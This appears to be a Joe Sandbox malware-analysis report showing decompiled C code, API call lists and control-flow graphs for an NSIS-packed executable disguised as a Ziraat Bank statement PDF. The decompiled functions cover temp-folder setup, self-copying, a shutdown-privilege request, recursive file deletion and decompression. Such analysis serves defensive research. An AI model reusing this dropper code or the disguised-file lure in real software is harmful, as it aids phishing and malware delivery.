                                                    0x004038ce
                                                    0x004038d6
                                                    0x004038d8
                                                    0x00000000
                                                    0x004038d8
                                                    0x004038d2
                                                    0x004038d4
                                                    0x004038f9
                                                    0x004038fd
                                                    0x00403906
                                                    0x0040390b
                                                    0x00403911
                                                    0x0040391c
                                                    0x0040391e
                                                    0x00403923
                                                    0x00403925
                                                    0x0040397d
                                                    0x00403982
                                                    0x0040398b
                                                    0x00403992
                                                    0x00403995
                                                    0x00403b6c
                                                    0x00403b6c
                                                    0x00403b71
                                                    0x00403b7a
                                                    0x00403b97
                                                    0x00403c0f
                                                    0x00403c0f
                                                    0x00403c17
                                                    0x00403c19
                                                    0x00403c19
                                                    0x00403c1f
                                                    0x00403c1f
                                                    0x00403bae
                                                    0x00403bba
                                                    0x00403bcb
                                                    0x00403bd2
                                                    0x00403bd9
                                                    0x00403bd9
                                                    0x00403be1
                                                    0x00403bed
                                                    0x00403bfb
                                                    0x00403c06
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00403bef
                                                    0x00403bef
                                                    0x00403bf0
                                                    0x00403bf2
                                                    0x00403bf3
                                                    0x00403bf4
                                                    0x00403bf9
                                                    0x00403c08
                                                    0x00403c0a
                                                    0x00000000
                                                    0x00403c0a
                                                    0x00000000
                                                    0x00403bf9
                                                    0x00403bed
                                                    0x00403b84
                                                    0x00403b8b
                                                    0x00403b8b
                                                    0x004039a1
                                                    0x00403a48
                                                    0x00403a48
                                                    0x00403a54
                                                    0x00000000
                                                    0x00403a54
                                                    0x004039b2
                                                    0x004039ba
                                                    0x00403a0c
                                                    0x00403a0c
                                                    0x00403a12
                                                    0x00403a19
                                                    0x00403a67
                                                    0x00403a69
                                                    0x00403a6e
                                                    0x00403a70
                                                    0x00403a78
                                                    0x00403a78
                                                    0x00403a83
                                                    0x00403a88
                                                    0x00403a8f
                                                    0x00403a95
                                                    0x00403a97
                                                    0x00403b6a
                                                    0x00403b6a
                                                    0x00403b6a
                                                    0x00000000
                                                    0x00403a9d
                                                    0x00403a9d
                                                    0x00403a9f
                                                    0x00403aa0
                                                    0x00403aa9
                                                    0x00403aa2
                                                    0x00403aa2
                                                    0x00403aa2
                                                    0x00403aaf
                                                    0x00403ab7
                                                    0x00403abe
                                                    0x00403ac6
                                                    0x00403ac6
                                                    0x00403ad3
                                                    0x00403adf
                                                    0x00403ae9
                                                    0x00403ae9
                                                    0x00403aeb
                                                    0x00403af2
                                                    0x00403afc
                                                    0x00403b08
                                                    0x00403b0e
                                                    0x00403b14
                                                    0x00403b17
                                                    0x00403b21
                                                    0x00403b27
                                                    0x00403b29
                                                    0x00403b2d
                                                    0x00403b3e
                                                    0x00403b44
                                                    0x00403b49
                                                    0x00403b4b
                                                    0x00403b4e
                                                    0x00403b54
                                                    0x00403b54
                                                    0x00403b4b
                                                    0x00403b29
                                                    0x00403b57
                                                    0x00403b5e
                                                    0x00403b5e
                                                    0x00403b5e
                                                    0x00403b5e
                                                    0x00403b65
                                                    0x00000000
                                                    0x00403b65
                                                    0x00403a97
                                                    0x00403a1b
                                                    0x00403a1e
                                                    0x00403a22
                                                    0x00403a27
                                                    0x00403a29
                                                    0x00000000
                                                    0x00000000
                                                    0x00403a35
                                                    0x00403a40
                                                    0x00403a45
                                                    0x00000000
                                                    0x00403a45
                                                    0x004039c3
                                                    0x004039db
                                                    0x004039ec
                                                    0x004039ed
                                                    0x004039f1
                                                    0x004039f3
                                                    0x00403a01
                                                    0x00403a08
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00403a08
                                                    0x00403a0a
                                                    0x00000000
                                                    0x00403a0a
                                                    0x0040392d
                                                    0x00403939
                                                    0x0040393e
                                                    0x00403943
                                                    0x00403945
                                                    0x00000000
                                                    0x00000000
                                                    0x0040394d
                                                    0x00403955
                                                    0x00403966
                                                    0x0040396e
                                                    0x00403970
                                                    0x00403975
                                                    0x00403977
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00403977
                                                    0x00000000
                                                    0x004038d4
                                                    0x0040387d
                                                    0x0040387f
                                                    0x00000000
                                                    0x00000000
                                                    0x00403881
                                                    0x00403885
                                                    0x00403889
                                                    0x00403890
                                                    0x00403890
                                                    0x00403890
                                                    0x00403890
                                                    0x00000000
                                                    0x00403890
                                                    0x0040388b
                                                    0x0040388e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040388e
                                                    0x00403827
                                                    0x0040382b
                                                    0x0040382e
                                                    0x00403835
                                                    0x00403835
                                                    0x00000000
                                                    0x00403835
                                                    0x00403830
                                                    0x00403833
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00403833
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00403801
                                                    0x00403801
                                                    0x00403802
                                                    0x00403803
                                                    0x00403803
                                                    0x00000000
                                                    0x00403801
                                                    0x00000000

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                    • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                    • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                    • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                    • OleInitialize.OLE32(00000000), ref: 0040377D
                                                    • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                    • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe",00000020,"C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe",00000000), ref: 004037E9
                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                    • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                      • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe",00000000,?), ref: 00403A8F
                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                    • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,00420F08,00000001), ref: 00403B21
                                                    • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                    • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                    • OleUninitialize.OLE32(?), ref: 00403B71
                                                    • ExitProcess.KERNEL32 ref: 00403B8B
                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                    • ExitProcess.KERNEL32 ref: 00403C1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                    • String ID: "C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                    • API String ID: 2292928366-2579741348
                                                    • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                    • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                    • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                    • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                    C-Code - Quality: 98%
                                                    			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E0040603F(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406668(0x425750, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F83(_t68);
					} else {
						lstrcatW(0x425750, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406668(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405D2C(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004056CA(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E004056CA(0xfffffff1, _t68);
											E00406428(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405D74(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70); // executed
						goto L26;
					}
					__eflags =  *0x425750 - 0x5c;
					if( *0x425750 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040699E(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405F37(_t68);
							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004056CA(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004056CA(0xfffffff1, _t68);
							return E00406428(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                    0x00405d7e
                                                    0x00405d83
                                                    0x00405d8c
                                                    0x00405d8f
                                                    0x00405d97
                                                    0x00405d9a
                                                    0x00405d9d
                                                    0x00405da5
                                                    0x00405da7
                                                    0x00405da8
                                                    0x00000000
                                                    0x00405da8
                                                    0x00405db3
                                                    0x00405db6
                                                    0x00405db6
                                                    0x00405db6
                                                    0x00405dba
                                                    0x00405dcd
                                                    0x00405dd4
                                                    0x00405dd9
                                                    0x00405ddd
                                                    0x00405ded
                                                    0x00405ddf
                                                    0x00405de5
                                                    0x00405de5
                                                    0x00405df2
                                                    0x00405df6
                                                    0x00405e02
                                                    0x00405e08
                                                    0x00405e0d
                                                    0x00405e13
                                                    0x00405e1e
                                                    0x00405e24
                                                    0x00405e26
                                                    0x00405e29
                                                    0x00405ed3
                                                    0x00405ed3
                                                    0x00405ed7
                                                    0x00405ed9
                                                    0x00405ed9
                                                    0x00405ed9
                                                    0x00405ed9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405e2f
                                                    0x00405e2f
                                                    0x00405e2f
                                                    0x00405e37
                                                    0x00405e57
                                                    0x00405e5f
                                                    0x00405e64
                                                    0x00405e6b
                                                    0x00405e86
                                                    0x00405e8b
                                                    0x00405e8d
                                                    0x00405eb1
                                                    0x00405e8f
                                                    0x00405e8f
                                                    0x00405e92
                                                    0x00405ea6
                                                    0x00405e94
                                                    0x00405e97
                                                    0x00405e9f
                                                    0x00405e9f
                                                    0x00405e92
                                                    0x00405e6d
                                                    0x00405e73
                                                    0x00405e75
                                                    0x00405e7b
                                                    0x00405e7b
                                                    0x00405e75
                                                    0x00000000
                                                    0x00405e6b
                                                    0x00405e39
                                                    0x00405e41
                                                    0x00000000
                                                    0x00000000
                                                    0x00405e43
                                                    0x00405e4b
                                                    0x00000000
                                                    0x00000000
                                                    0x00405e4d
                                                    0x00405e55
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405eb6
                                                    0x00405ebe
                                                    0x00405ec4
                                                    0x00405ec4
                                                    0x00405ecd
                                                    0x00000000
                                                    0x00405ecd
                                                    0x00405df8
                                                    0x00405e00
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405dbc
                                                    0x00405dbc
                                                    0x00405dbe
                                                    0x00405ede
                                                    0x00405ee0
                                                    0x00405ee3
                                                    0x00405f34
                                                    0x00405f34
                                                    0x00405f34
                                                    0x00405ee5
                                                    0x00405ee8
                                                    0x00405ef3
                                                    0x00405ef8
                                                    0x00405efa
                                                    0x00000000
                                                    0x00000000
                                                    0x00405efd
                                                    0x00405f09
                                                    0x00405f0e
                                                    0x00405f10
                                                    0x00000000
                                                    0x00405f2b
                                                    0x00405f12
                                                    0x00405f15
                                                    0x00000000
                                                    0x00000000
                                                    0x00405f1a
                                                    0x00000000
                                                    0x00405f21
                                                    0x00405eea
                                                    0x00405eea
                                                    0x00000000
                                                    0x00405eea
                                                    0x00405dc4
                                                    0x00405dc7
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405dc7

                                                    APIs
                                                    • DeleteFileW.KERNELBASE(?,?,766DFAA0,766DF560,00000000), ref: 00405D9D
                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqC018.tmp\*.*,\*.*), ref: 00405DE5
                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsqC018.tmp\*.*,?,?,766DFAA0,766DF560,00000000), ref: 00405E0E
                                                    • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsqC018.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsqC018.tmp\*.*,?,?,766DFAA0,766DF560,00000000), ref: 00405E1E
                                                    • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                    • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.306515084.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306533062.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306537435.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.306575632.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                    Similarity
                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                    • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsqC018.tmp\*.*$\*.*
                                                    • API String ID: 2035342205-2367051894
                                                    • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                    • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                    • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                    • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 630 406d5f-406d64 631 406dd5-406df3 630->631 632 406d66-406d95 630->632 633 4073cb-4073e0 631->633 634 406d97-406d9a 632->634 635 406d9c-406da0 632->635 636 4073e2-4073f8 633->636 637 4073fa-407410 633->637 638 406dac-406daf 634->638 639 406da2-406da6 635->639 640 406da8 635->640 641 407413-40741a 636->641 637->641 642 406db1-406dba 638->642 643 406dcd-406dd0 638->643 639->638 640->638 647 407441-40744d 641->647 648 40741c-407420 641->648 644 406dbc 642->644 645 406dbf-406dcb 642->645 646 406fa2-406fc0 643->646 644->645 649 406e35-406e63 645->649 653 406fc2-406fd6 646->653 654 406fd8-406fea 646->654 656 406be3-406bec 647->656 650 407426-40743e 648->650 651 4075cf-4075d9 648->651 657 406e65-406e7d 649->657 658 406e7f-406e99 649->658 650->647 655 4075e5-4075f8 651->655 659 406fed-406ff7 653->659 654->659 663 4075fd-407601 655->663 660 406bf2 656->660 661 4075fa 656->661 662 406e9c-406ea6 657->662 658->662 664 406ff9 659->664 665 406f9a-406fa0 659->665 667 406bf9-406bfd 660->667 668 406d39-406d5a 660->668 669 406c9e-406ca2 660->669 670 406d0e-406d12 660->670 661->663 672 406eac 662->672 673 406e1d-406e23 662->673 681 407581-40758b 664->681 682 406f7f-406f97 664->682 665->646 671 406f3e-406f48 665->671 667->655 674 406c03-406c10 667->674 668->633 683 406ca8-406cc1 669->683 684 40754e-407558 669->684 675 406d18-406d2c 670->675 676 40755d-407567 670->676 677 40758d-407597 671->677 678 406f4e-407117 671->678 689 406e02-406e1a 672->689 690 407569-407573 672->690 679 406ed6-406edc 673->679 680 406e29-406e2f 673->680 674->661 688 406c16-406c5c 674->688 691 406d2f-406d37 675->691 676->655 677->655 678->656 686 406f3a 679->686 687 406ede-406efc 679->687 680->649 680->686 681->655 682->665 693 406cc4-406cc8 683->693 684->655 686->671 694 406f14-406f26 687->694 695 406efe-406f12 687->695 696 406c84-406c86 688->696 697 406c5e-406c62 688->697 689->673 690->655 691->668 691->670 693->669 698 406cca-406cd0 693->698 701 406f29-406f33 694->701 695->701 704 406c94-406c9c 696->704 705 406c88-406c92 696->705 702 406c64-406c67 GlobalFree 697->702 703 406c6d-406c7b GlobalAlloc 697->703 699 406cd2-406cd9 698->699 700 406cfa-406d0c 698->700 706 406ce4-406cf4 GlobalAlloc 699->706 707 406cdb-406cde GlobalFree 699->707 700->691 701->679 708 406f35 701->708 702->703 703->661 709 406c81 703->709 704->693 705->704 705->705 706->661 706->700 707->706 711 407575-40757f 708->711 712 406ebb-406ed3 708->712 709->696 711->655 712->679
                                                    C-Code - Quality: 98%
                                                    			E00406D5F() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
